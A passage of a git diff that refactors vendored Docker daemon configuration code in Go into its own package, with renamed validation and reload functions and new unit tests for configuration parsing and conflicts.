daemon.TagImageWithReference(id, newTag); err != nil { - return "", err - } - imageRef = newTag.String() } - - attributes := map[string]string{ + daemon.LogContainerEventWithAttributes(container, "commit", map[string]string{ "comment": c.Comment, "imageID": id.String(), "imageRef": imageRef, - } - daemon.LogContainerEventWithAttributes(container, "commit", attributes) + }) containerActions.WithValues("commit").UpdateSince(start) return id.String(), nil } - -func (daemon *Daemon) exportContainerRw(container *container.Container) (io.ReadCloser, error) { - if err := daemon.Mount(container); err != nil { - return nil, err - } - - archive, err := container.RWLayer.TarStream() - if err != nil { - daemon.Unmount(container) // logging is already handled in the `Unmount` function - return nil, err - } - return ioutils.NewReadCloserWrapper(archive, func() error { - archive.Close() - return container.RWLayer.Unmount() - }), - nil -} diff --git a/vendor/github.com/docker/docker/daemon/config.go b/vendor/github.com/docker/docker/daemon/config/config.go similarity index 60% rename from vendor/github.com/docker/docker/daemon/config.go rename to vendor/github.com/docker/docker/daemon/config/config.go index 42ef18f74a..6cda223a11 100644 --- a/vendor/github.com/docker/docker/daemon/config.go +++ b/vendor/github.com/docker/docker/daemon/config/config.go @@ -1,4 +1,4 @@ -package daemon +package config // import "github.com/docker/docker/daemon/config" import ( "bytes" @@ -7,39 +7,42 @@ import ( "fmt" "io" "io/ioutil" + "os" + "reflect" "runtime" "strings" "sync" - "github.com/Sirupsen/logrus" + daemondiscovery "github.com/docker/docker/daemon/discovery" "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/authorization" "github.com/docker/docker/pkg/discovery" "github.com/docker/docker/registry" "github.com/imdario/mergo" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" ) const ( - // defaultMaxConcurrentDownloads is the default value for + // DefaultMaxConcurrentDownloads is the default value for // maximum number of downloads that // may take place at a time for each pull. - defaultMaxConcurrentDownloads = 3 - // defaultMaxConcurrentUploads is the default value for + DefaultMaxConcurrentDownloads = 3 + // DefaultMaxConcurrentUploads is the default value for // maximum number of uploads that // may take place at a time for each push. - defaultMaxConcurrentUploads = 5 - // stockRuntimeName is the reserved name/alias used to represent the + DefaultMaxConcurrentUploads = 5 + // StockRuntimeName is the reserved name/alias used to represent the // OCI runtime being shipped with the docker daemon package. - stockRuntimeName = "runc" -) - -const ( - defaultNetworkMtu = 1500 - disableNetworkBridge = "none" -) - -const ( - defaultShutdownTimeout = 15 + StockRuntimeName = "runc" + // DefaultShmSize is the default value for container's shm size + DefaultShmSize = int64(67108864) + // DefaultNetworkMtu is the default value for network MTU + DefaultNetworkMtu = 1500 + // DisableNetworkBridge is the default value of the option to disable network bridge + DisableNetworkBridge = "none" + // DefaultInitBinary is the name of the default init binary + DefaultInitBinary = "docker-init" ) // flatOptions contains configuration keys @@ -68,6 +71,12 @@ type commonBridgeConfig struct { FixedCIDR string `json:"fixed-cidr,omitempty"` } +// NetworkConfig stores the daemon-wide networking configurations +type NetworkConfig struct { + // Default address pools for docker networks + DefaultAddressPools opts.PoolsOpt `json:"default-address-pools,omitempty"` +} + // CommonTLSOptions defines TLS configuration for the daemon server. // It includes json tags to deserialize configuration from a file // using the same names that the flags in the command line use. @@ -82,25 +91,33 @@ type CommonTLSOptions struct { // It includes json tags to deserialize configuration from a file // using the same names that the flags in the command line use. type CommonConfig struct { - AuthorizationPlugins []string `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins - AutoRestart bool `json:"-"` - Context map[string][]string `json:"-"` - DisableBridge bool `json:"-"` - DNS []string `json:"dns,omitempty"` - DNSOptions []string `json:"dns-opts,omitempty"` - DNSSearch []string `json:"dns-search,omitempty"` - ExecOptions []string `json:"exec-opts,omitempty"` - GraphDriver string `json:"storage-driver,omitempty"` - GraphOptions []string `json:"storage-opts,omitempty"` - Labels []string `json:"labels,omitempty"` - Mtu int `json:"mtu,omitempty"` - Pidfile string `json:"pidfile,omitempty"` - RawLogs bool `json:"raw-logs,omitempty"` - Root string `json:"graph,omitempty"` - SocketGroup string `json:"group,omitempty"` - TrustKeyPath string `json:"-"` - CorsHeaders string `json:"api-cors-header,omitempty"` - EnableCors bool `json:"api-enable-cors,omitempty"` + AuthzMiddleware *authorization.Middleware `json:"-"` + AuthorizationPlugins []string `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins + AutoRestart bool `json:"-"` + Context map[string][]string `json:"-"` + DisableBridge bool `json:"-"` + DNS []string `json:"dns,omitempty"` + DNSOptions []string `json:"dns-opts,omitempty"` + DNSSearch []string `json:"dns-search,omitempty"` + ExecOptions []string `json:"exec-opts,omitempty"` + GraphDriver string `json:"storage-driver,omitempty"` + GraphOptions []string `json:"storage-opts,omitempty"` + Labels []string `json:"labels,omitempty"` + Mtu int `json:"mtu,omitempty"` + NetworkDiagnosticPort int `json:"network-diagnostic-port,omitempty"` + Pidfile string `json:"pidfile,omitempty"` + RawLogs bool `json:"raw-logs,omitempty"` + RootDeprecated string `json:"graph,omitempty"` + Root string `json:"data-root,omitempty"` + ExecRoot string `json:"exec-root,omitempty"` + SocketGroup string `json:"group,omitempty"` + CorsHeaders string `json:"api-cors-header,omitempty"` + + // TrustKeyPath is used to generate the daemon ID and for signing schema 1 manifests + // when pushing to a registry which does not support schema 2. This field is marked as + // deprecated because schema 1 manifests are deprecated in favor of schema 2 and the + // daemon ID will use a dedicated identifier not shared with exported signatures. + TrustKeyPath string `json:"deprecated-key-path,omitempty"` // LiveRestoreEnabled determines whether we should keep containers // alive upon daemon shutdown/start @@ -147,70 +164,54 @@ type CommonConfig struct { // given to the /swarm/init endpoint and no advertise address is // specified. SwarmDefaultAdvertiseAddr string `json:"swarm-default-advertise-addr"` - MetricsAddress string `json:"metrics-addr"` + + // SwarmRaftHeartbeatTick is the number of ticks in time for swarm mode raft quorum heartbeat + // Typical value is 1 + SwarmRaftHeartbeatTick uint32 `json:"swarm-raft-heartbeat-tick"` + + // SwarmRaftElectionTick is the number of ticks to elapse before followers in the quorum can propose + // a new round of leader election. Default, recommended value is at least 10X that of Heartbeat tick. + // Higher values can make the quorum less sensitive to transient faults in the environment, but this also + // means it takes longer for the managers to detect a down leader. + SwarmRaftElectionTick uint32 `json:"swarm-raft-election-tick"` + + MetricsAddress string `json:"metrics-addr"` LogConfig - bridgeConfig // bridgeConfig holds bridge network specific configuration. + BridgeConfig // bridgeConfig holds bridge network specific configuration. + NetworkConfig registry.ServiceOptions - reloadLock sync.Mutex - valuesSet map[string]interface{} + sync.Mutex + // FIXME(vdemeester) This part is not that clear and is mainly dependent on cli flags + // It should probably be handled outside this package. + ValuesSet map[string]interface{} `json:"-"` Experimental bool `json:"experimental"` // Experimental indicates whether experimental features should be exposed or not -} -// InstallCommonFlags adds flags to the pflag.FlagSet to configure the daemon -func (config *Config) InstallCommonFlags(flags *pflag.FlagSet) { - var maxConcurrentDownloads, maxConcurrentUploads int - - config.ServiceOptions.InstallCliFlags(flags) - - flags.Var(opts.NewNamedListOptsRef("storage-opts", &config.GraphOptions, nil), "storage-opt", "Storage driver options") - flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &config.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load") - flags.Var(opts.NewNamedListOptsRef("exec-opts", &config.ExecOptions, nil), "exec-opt", "Runtime execution options") - flags.StringVarP(&config.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file") - flags.StringVarP(&config.Root, "graph", "g", defaultGraph, "Root of the Docker runtime") - flags.BoolVarP(&config.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run") - flags.MarkDeprecated("restart", "Please use a restart policy on docker run") - flags.StringVarP(&config.GraphDriver, "storage-driver", "s", "", "Storage driver to use") - flags.IntVar(&config.Mtu, "mtu", 0, "Set the containers network MTU") - flags.BoolVar(&config.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring") - // FIXME: why the inconsistency between "hosts" and "sockets"? - flags.Var(opts.NewListOptsRef(&config.DNS, opts.ValidateIPAddress), "dns", "DNS server to use") - flags.Var(opts.NewNamedListOptsRef("dns-opts", &config.DNSOptions, nil), "dns-opt", "DNS options to use") - flags.Var(opts.NewListOptsRef(&config.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use") - flags.Var(opts.NewNamedListOptsRef("labels", &config.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon") - flags.StringVar(&config.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs") - flags.Var(opts.NewNamedMapOpts("log-opts", config.LogConfig.Config, nil), "log-opt", "Default log driver options for containers") - flags.StringVar(&config.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise") - flags.StringVar(&config.ClusterStore, "cluster-store", "", "URL of the distributed storage backend") - flags.Var(opts.NewNamedMapOpts("cluster-store-opts", config.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options") - flags.StringVar(&config.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API") - flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", defaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull") - flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", defaultMaxConcurrentUploads, "Set the max concurrent uploads for each push") - flags.IntVar(&config.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout") - - flags.StringVar(&config.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address") - flags.BoolVar(&config.Experimental, "experimental", false, "Enable experimental features") - - flags.StringVar(&config.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on") - - config.MaxConcurrentDownloads = &maxConcurrentDownloads - config.MaxConcurrentUploads = &maxConcurrentUploads + // Exposed node Generic Resources + // e.g: ["orange=red", "orange=green", "orange=blue", "apple=3"] + NodeGenericResources []string `json:"node-generic-resources,omitempty"` + // NetworkControlPlaneMTU allows to specify the control plane MTU, this will allow to optimize the network use in some components + NetworkControlPlaneMTU int `json:"network-control-plane-mtu,omitempty"` + + // ContainerAddr is the address used to connect to containerd if we're + // not starting it ourselves + ContainerdAddr string `json:"containerd,omitempty"` } // IsValueSet returns true if a configuration value // was explicitly set in the configuration file. -func (config *Config) IsValueSet(name string) bool { - if config.valuesSet == nil { +func (conf *Config) IsValueSet(name string) bool { + if conf.ValuesSet == nil { return false } - _, ok := config.valuesSet[name] + _, ok := conf.ValuesSet[name] return ok } -// NewConfig returns a new fully initialized Config struct -func NewConfig() *Config { +// New returns a new fully initialized Config struct +func New() *Config { config := Config{} config.LogConfig.Config = make(map[string]string) config.ClusterOpts = make(map[string]string) @@ -221,15 +222,13 @@ func NewConfig() *Config { return &config } -func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) { - if runtime.GOOS == "solaris" && (clusterAdvertise != "" || clusterStore != "") { - return "", errors.New("Cluster Advertise Settings not supported on Solaris") - } +// ParseClusterAdvertiseSettings parses the specified advertise settings +func ParseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) { if clusterAdvertise == "" { - return "", errDiscoveryDisabled + return "", daemondiscovery.ErrDiscoveryDisabled } if clusterStore == "" { - return "", fmt.Errorf("invalid cluster configuration. --cluster-advertise must be accompanied by --cluster-store configuration") + return "", errors.New("invalid cluster configuration. --cluster-advertise must be accompanied by --cluster-store configuration") } advertise, err := discovery.ParseAdvertise(clusterAdvertise) @@ -239,7 +238,7 @@ func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (strin return advertise, nil } -// GetConflictFreeLabels validate Labels for conflict +// GetConflictFreeLabels validates Labels for conflict // In swarm the duplicates for labels are removed // so we only take same values here, no conflict values // If the key-value is the same we will only take the last label @@ -263,34 +262,46 @@ func GetConflictFreeLabels(labels []string) ([]string, error) { return newLabels, nil } -// ReloadConfiguration reads the configuration in the host and reloads the daemon and server. -func ReloadConfiguration(configFile string, flags *pflag.FlagSet, reload func(*Config)) error { +// ValidateReservedNamespaceLabels errors if the reserved namespaces com.docker.*, +// io.docker.*, org.dockerproject.* are used in a configured engine label. +// +// TODO: This is a separate function because we need to warn users first of the +// deprecation. When we return an error, this logic can be added to Validate +// or GetConflictFreeLabels instead of being here. +func ValidateReservedNamespaceLabels(labels []string) error { + for _, label := range labels { + lowered := strings.ToLower(label) + if strings.HasPrefix(lowered, "com.docker.") || strings.HasPrefix(lowered, "io.docker.") || + strings.HasPrefix(lowered, "org.dockerproject.") { + return fmt.Errorf( + "label %s not allowed: the namespaces com.docker.*, io.docker.*, and org.dockerproject.* are reserved for Docker's internal use", + label) + } + } + return nil +} + +// Reload reads the configuration in the host and reloads the daemon and server. +func Reload(configFile string, flags *pflag.FlagSet, reload func(*Config)) error { logrus.Infof("Got signal to reload configuration, reloading from: %s", configFile) newConfig, err := getConflictFreeConfiguration(configFile, flags) if err != nil { - return err + if flags.Changed("config-file") || !os.IsNotExist(err) { + return fmt.Errorf("unable to configure the Docker daemon with file %s: %v", configFile, err) + } + newConfig = New() } - if err := ValidateConfiguration(newConfig); err != nil { + if err := Validate(newConfig); err != nil { return fmt.Errorf("file configuration validation failed (%v)", err) } - // Labels of the docker engine used to allow multiple values associated with the same key. - // This is deprecated in 1.13, and, be removed after 3 release cycles. - // The following will check the conflict of labels, and report a warning for deprecation. - // - // TODO: After 3 release cycles (1.16) an error will be returned, and labels will be - // sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels): - // - // newLabels, err := GetConflictFreeLabels(newConfig.Labels) - // if err != nil { - // return err - // } - // newConfig.Labels = newLabels - // - if _, err := GetConflictFreeLabels(newConfig.Labels); err != nil { - logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err) + // Check if duplicate label-keys with different values are found + newLabels, err := GetConflictFreeLabels(newConfig.Labels) + if err != nil { + return err } + newConfig.Labels = newLabels reload(newConfig) return nil @@ -312,8 +323,8 @@ func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, config return nil, err } - if err := ValidateConfiguration(fileConfig); err != nil { - return nil, fmt.Errorf("file configuration validation failed (%v)", err) + if err := Validate(fileConfig); err != nil { + return nil, fmt.Errorf("configuration validation from file failed (%v)", err) } // merge flags configuration on top of the file configuration @@ -323,8 +334,8 @@ func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, config // We need to validate again once both fileConfig and flagsConfig // have been merged - if err := ValidateConfiguration(fileConfig); err != nil { - return nil, fmt.Errorf("file configuration validation failed (%v)", err) + if err := Validate(fileConfig); err != nil { + return nil, fmt.Errorf("merged configuration validation from file and command line flags failed (%v)", err) } return fileConfig, nil @@ -384,12 +395,25 @@ func getConflictFreeConfiguration(configFile string, flags *pflag.FlagSet) (*Con }) } - config.valuesSet = configSet + config.ValuesSet = configSet } reader = bytes.NewReader(b) - err = json.NewDecoder(reader).Decode(&config) - return &config, err + if err := json.NewDecoder(reader).Decode(&config); err != nil { + return nil, err + } + + if config.RootDeprecated != "" { + logrus.Warn(`The "graph" config file option is deprecated. Please use "data-root" instead.`) + + if config.Root != "" { + return nil, fmt.Errorf(`cannot specify both "graph" and "data-root" config file options`) + } + + config.Root = config.RootDeprecated + } + + return &config, nil } // configValuesSet returns the configuration values explicitly set in the file. @@ -472,10 +496,10 @@ func findConfigurationConflicts(config map[string]interface{}, flags *pflag.Flag return nil } -// ValidateConfiguration validates some specific configs. +// Validate validates some specific configs. // such as config.DNS, config.Labels, config.DNSSearch, // as well as config.MaxConcurrentDownloads, config.MaxConcurrentUploads. -func ValidateConfiguration(config *Config) error { +func Validate(config *Config) error { // validate DNS for _, dns := range config.DNS { if _, err := opts.ValidateIPAddress(dns); err != nil { @@ -496,30 +520,48 @@ func ValidateConfiguration(config *Config) error { return err } } - // validate MaxConcurrentDownloads - if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 { + if config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 { return fmt.Errorf("invalid max concurrent downloads: %d", *config.MaxConcurrentDownloads) } - // validate MaxConcurrentUploads - if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 { + if config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 { return fmt.Errorf("invalid max concurrent uploads: %d", *config.MaxConcurrentUploads) } // validate that "default" runtime is not reset if runtimes := config.GetAllRuntimes(); len(runtimes) > 0 { - if _, ok := runtimes[stockRuntimeName]; ok { - return fmt.Errorf("runtime name '%s' is reserved", stockRuntimeName) + if _, ok := runtimes[StockRuntimeName]; ok { + return fmt.Errorf("runtime name '%s' is reserved", StockRuntimeName) } } - if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != stockRuntimeName { + if _, err := ParseGenericResources(config.NodeGenericResources); err != nil { + return err + } + + if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != StockRuntimeName { runtimes := config.GetAllRuntimes() if _, ok := runtimes[defaultRuntime]; !ok { return fmt.Errorf("specified default runtime '%s' does not exist", defaultRuntime) } } - return nil + // validate platform-specific settings + return config.ValidatePlatformConfig() +} + +// ModifiedDiscoverySettings returns whether the discovery configuration has been modified or not. +func ModifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool { + if config.ClusterStore != backendType || config.ClusterAdvertise != advertise { + return true + } + + if (config.ClusterOpts == nil && clusterOpts == nil) || + (config.ClusterOpts == nil && len(clusterOpts) == 0) || + (len(config.ClusterOpts) == 0 && clusterOpts == nil) { + return false + } + + return !reflect.DeepEqual(config.ClusterOpts, clusterOpts) } diff --git a/vendor/github.com/docker/docker/daemon/config/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config/config_common_unix.go new file mode 100644 index 0000000000..4bdf758869 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_common_unix.go @@ -0,0 +1,71 @@ +// +build linux freebsd + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "net" + + "github.com/docker/docker/api/types" +) + +// CommonUnixConfig defines configuration of a docker daemon that is +// common across Unix platforms. +type CommonUnixConfig struct { + Runtimes map[string]types.Runtime `json:"runtimes,omitempty"` + DefaultRuntime string `json:"default-runtime,omitempty"` + DefaultInitBinary string `json:"default-init,omitempty"` +} + +type commonUnixBridgeConfig struct { + DefaultIP net.IP `json:"ip,omitempty"` + IP string `json:"bip,omitempty"` + DefaultGatewayIPv4 net.IP `json:"default-gateway,omitempty"` + DefaultGatewayIPv6 net.IP `json:"default-gateway-v6,omitempty"` + InterContainerCommunication bool `json:"icc,omitempty"` +} + +// GetRuntime returns the runtime path and arguments for a given +// runtime name +func (conf *Config) GetRuntime(name string) *types.Runtime { + conf.Lock() + defer conf.Unlock() + if rt, ok := conf.Runtimes[name]; ok { + return &rt + } + return nil +} + +// GetDefaultRuntimeName returns the current default runtime +func (conf *Config) GetDefaultRuntimeName() string { + conf.Lock() + rt := conf.DefaultRuntime + conf.Unlock() + + return rt +} + +// GetAllRuntimes returns a copy of the runtimes map +func (conf *Config) GetAllRuntimes() map[string]types.Runtime { + conf.Lock() + rts := conf.Runtimes + conf.Unlock() + return rts +} + +// GetExecRoot returns the user configured Exec-root +func (conf *Config) GetExecRoot() string { + return conf.ExecRoot +} + +// GetInitPath returns the configured docker-init path +func (conf *Config) GetInitPath() string { + conf.Lock() + defer conf.Unlock() + if conf.InitPath != "" { + return conf.InitPath + } + if conf.DefaultInitBinary != "" { + return conf.DefaultInitBinary + } + return DefaultInitBinary +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go b/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go new file mode 100644 index 0000000000..47774a8ec1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go @@ -0,0 +1,84 @@ +// +build !windows + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +func TestCommonUnixValidateConfigurationErrors(t *testing.T) { + testCases := []struct { + config *Config + }{ + // Can't override the stock runtime + { + config: &Config{ + CommonUnixConfig: CommonUnixConfig{ + Runtimes: map[string]types.Runtime{ + StockRuntimeName: {}, + }, + }, + }, + }, + // Default runtime should be present in runtimes + { + config: &Config{ + CommonUnixConfig: CommonUnixConfig{ + Runtimes: map[string]types.Runtime{ + "foo": {}, + }, + DefaultRuntime: "bar", + }, + }, + }, + } + for _, tc := range testCases { + err := Validate(tc.config) + if err == nil { + t.Fatalf("expected error, got nil for config %v", tc.config) + } + } +} + +func TestCommonUnixGetInitPath(t *testing.T) { + testCases := []struct { + config *Config + expectedInitPath string + }{ + { + config: &Config{ + InitPath: "some-init-path", + }, + expectedInitPath: "some-init-path", + }, + { + config: &Config{ + CommonUnixConfig: CommonUnixConfig{ + DefaultInitBinary: "foo-init-bin", + }, + }, + expectedInitPath: "foo-init-bin", + }, + { + config: &Config{ + InitPath: "init-path-A", + CommonUnixConfig: CommonUnixConfig{ + DefaultInitBinary: "init-path-B", + }, + }, + expectedInitPath: "init-path-A", + }, + { + config: &Config{}, + expectedInitPath: "docker-init", + }, + } + for _, tc := range testCases { + initPath := tc.config.GetInitPath() + if initPath != tc.expectedInitPath { + t.Fatalf("expected initPath to be %v, got %v", tc.expectedInitPath, initPath) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_test.go b/vendor/github.com/docker/docker/daemon/config/config_test.go new file mode 100644 index 0000000000..6998ed3312 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_test.go @@ -0,0 +1,518 @@ +package config // import "github.com/docker/docker/daemon/config" + +import ( + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/daemon/discovery" + "github.com/docker/docker/opts" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" + "gotest.tools/skip" +) + +func TestDaemonConfigurationNotFound(t *testing.T) { + _, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker") + if err == nil || !os.IsNotExist(err) { + t.Fatalf("expected does not exist error, got %v", err) + } +} + +func TestDaemonBrokenConfiguration(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"Debug": tru`)) + f.Close() + + _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) + if err == nil { + t.Fatalf("expected error, got %v", err) + } +} + +func TestParseClusterAdvertiseSettings(t *testing.T) { + _, err := ParseClusterAdvertiseSettings("something", "") + if err != discovery.ErrDiscoveryDisabled { + t.Fatalf("expected discovery disabled error, got %v\n", err) + } + + _, err = ParseClusterAdvertiseSettings("", "something") + if err == nil { + t.Fatalf("expected discovery store error, got %v\n", err) + } + + _, err = ParseClusterAdvertiseSettings("etcd", "127.0.0.1:8080") + if err != nil { + t.Fatal(err) + } +} + +func TestFindConfigurationConflicts(t *testing.T) { + config := map[string]interface{}{"authorization-plugins": "foobar"} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + flags.String("authorization-plugins", "", "") + assert.Check(t, flags.Set("authorization-plugins", "asdf")) + assert.Check(t, is.ErrorContains(findConfigurationConflicts(config, flags), "authorization-plugins: (from flag: asdf, from file: foobar)")) +} + +func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) { + config := map[string]interface{}{"hosts": []string{"qwer"}} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + var hosts []string + flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to") + assert.Check(t, flags.Set("host", "tcp://127.0.0.1:4444")) + assert.Check(t, flags.Set("host", "unix:///var/run/docker.sock")) + assert.Check(t, is.ErrorContains(findConfigurationConflicts(config, flags), "hosts")) +} + +func TestDaemonConfigurationMergeConflicts(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"debug": true}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.Bool("debug", false, "") + flags.Set("debug", "false") + + _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "debug") { + t.Fatalf("expected debug conflict, got %v", err) + } +} + +func TestDaemonConfigurationMergeConcurrent(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"max-concurrent-downloads": 1}`)) + f.Close() + + _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) + if err != nil { + t.Fatal("expected error, got nil") + } +} + +func TestDaemonConfigurationMergeConcurrentError(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"max-concurrent-downloads": -1}`)) + f.Close() + + _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) + if err == nil { + t.Fatalf("expected no error, got error %v", err) + } +} + +func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("tlscacert", "", "") + flags.Set("tlscacert", "~/.docker/ca.pem") + + _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "tlscacert") { + t.Fatalf("expected tlscacert conflict, got %v", err) + } +} + +func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) { + config := map[string]interface{}{"tls-verify": "true"} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + flags.Bool("tlsverify", false, "") + err := findConfigurationConflicts(config, flags) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") { + t.Fatalf("expected tls-verify conflict, got %v", err) + } +} + +func TestFindConfigurationConflictsWithMergedValues(t *testing.T) { + var hosts []string + config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"} + flags := pflag.NewFlagSet("base", pflag.ContinueOnError) + flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "") + + err := findConfigurationConflicts(config, flags) + if err != nil { + t.Fatal(err) + } + + flags.Set("host", "unix:///var/run/docker.sock") + err = findConfigurationConflicts(config, flags) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") { + t.Fatalf("expected hosts conflict, got %v", err) + } +} + +func TestValidateReservedNamespaceLabels(t *testing.T) { + for _, validLabels := range [][]string{ + nil, // no error if there are no labels + { // no error if there aren't any reserved namespace labels + "hello=world", + "label=me", + }, + { // only reserved namespaces that end with a dot are invalid + "com.dockerpsychnotreserved.label=value", + "io.dockerproject.not=reserved", + "org.docker.not=reserved", + }, + } { + assert.Check(t, ValidateReservedNamespaceLabels(validLabels)) + } + + for _, invalidLabel := range []string{ + "com.docker.feature=enabled", + "io.docker.configuration=0", + "org.dockerproject.setting=on", + // casing doesn't matter + "COM.docker.feature=enabled", + "io.DOCKER.CONFIGURATION=0", + "Org.Dockerproject.Setting=on", + } { + err := ValidateReservedNamespaceLabels([]string{ + "valid=label", + invalidLabel, + "another=valid", + }) + assert.Check(t, is.ErrorContains(err, invalidLabel)) + } +} + +func TestValidateConfigurationErrors(t *testing.T) { + minusNumber := -10 + testCases := []struct { + config *Config + }{ + { + config: &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"one"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo=bar", "one"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"1.1.1.1o"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"2.2.2.2", "1.1.1.1o"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"123456"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"a.b.c", "123456"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + MaxConcurrentDownloads: &minusNumber, + // This is weird... + ValuesSet: map[string]interface{}{ + "max-concurrent-downloads": -1, + }, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + MaxConcurrentUploads: &minusNumber, + // This is weird... + ValuesSet: map[string]interface{}{ + "max-concurrent-uploads": -1, + }, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + NodeGenericResources: []string{"foo"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + NodeGenericResources: []string{"foo=bar", "foo=1"}, + }, + }, + }, + } + for _, tc := range testCases { + err := Validate(tc.config) + if err == nil { + t.Fatalf("expected error, got nil for config %v", tc.config) + } + } +} + +func TestValidateConfiguration(t *testing.T) { + minusNumber := 4 + testCases := []struct { + config *Config + }{ + { + config: &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"one=two"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"1.1.1.1"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"a.b.c"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + MaxConcurrentDownloads: &minusNumber, + // This is weird... + ValuesSet: map[string]interface{}{ + "max-concurrent-downloads": -1, + }, + }, + }, + }, + { + config: &Config{ + 